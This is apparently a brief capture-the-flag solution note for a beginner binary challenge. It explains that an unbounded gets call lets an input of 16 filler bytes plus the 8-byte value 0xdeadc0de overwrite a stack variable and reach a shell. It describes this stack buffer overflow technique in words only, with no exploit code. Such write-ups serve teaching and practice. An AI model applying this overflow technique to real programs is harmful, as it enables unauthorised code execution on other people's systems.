Solution

no pie enable. so we can simply overwrite.

note that there are gets without length, which can perform buffoverflow

stack

since s is above var_8h, we can write random 16 bytes + 0xdeadc0de in 8 bytes to overwrite var_8h to value of 0xdeadc0de, which will lead us to the shell.
